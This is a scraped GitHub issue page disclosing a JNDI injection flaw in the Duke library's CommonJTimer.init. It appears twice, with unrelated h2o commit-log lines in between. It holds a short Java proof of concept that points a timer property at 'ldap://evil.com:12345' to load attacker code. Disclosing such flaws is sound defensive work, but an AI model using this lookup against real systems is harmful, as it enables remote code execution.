You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Describe the vulnerability
no.priv.garshol.duke.server.CommonJTimer.init(Properties) is designed to initialize a timer. However, passing an unchecked argument to this API can lead to the execution of arbitrary codes. For instance, following codes will lead to the execution of arbitrary codes from attackers:
CommonJTimer timer = new CommonJTimer();
Properties timerProperties = new Properties();
timerProperties.setProperty("duke.timer-jndipath", "ldap://evil.com:12345");
timer.init(timerProperties);
To Reproduce
Build an LDAP server and provide malicious codes. Then just execute above codes would reproduce it.
The text was updated successfully, but these errors were encountered:
…_status() in h20.py #7079 [nocheck] (#15653)
* [GH-15687] Extract string comparators from Duke library (#15692)
* [GH-15680] Adding installation disclaimer in documentation (#15681)
* ht/adding disclaimer in docs
* ht/added flow & download page
* ht/updated download page
* ht/added security documentation section
* ht/user guide updates
* ht/uniformity
* ht/added additional note to welcome page
* callouts
* ht/banner color switch
* ht/rename callout
---------
Co-authored-by: Jeff Fohl <[email protected]>
* GH-15672: Tomas Fryda suggested instead of changing every test, the change should be made in standalone test. He provides the code and I just copied and pasted. (#15675)
* Added verbose paramerter to init() in h2o.py also guarded h2oconn.cluster.show_status()
* changes verbose param position before ** kwargs
* final commit
* removed space, and made it in rel-3.42.0
* added space
---------
Co-authored-by: Marek Novotný <[email protected]>
Co-authored-by: Hannah <[email protected]>
Co-authored-by: Jeff Fohl <[email protected]>
Co-authored-by: wendycwong <[email protected]>
According to larsga/Duke#273
Describe the vulnerability
no.priv.garshol.duke.server.CommonJTimer.init(Properties) is designed to initialize a timer. However, passing an unchecked argument to this API can lead to the execution of arbitrary codes. For instance, following codes will lead to the execution of arbitrary codes from attackers:
CommonJTimer timer = new CommonJTimer();
Properties timerProperties = new Properties();
timerProperties.setProperty("duke.timer-jndipath", "ldap://evil.com:12345");
timer.init(timerProperties);
To Reproduce
Build an LDAP server and provide malicious codes. Then just execute above codes would reproduce it.
The text was updated successfully, but these errors were encountered: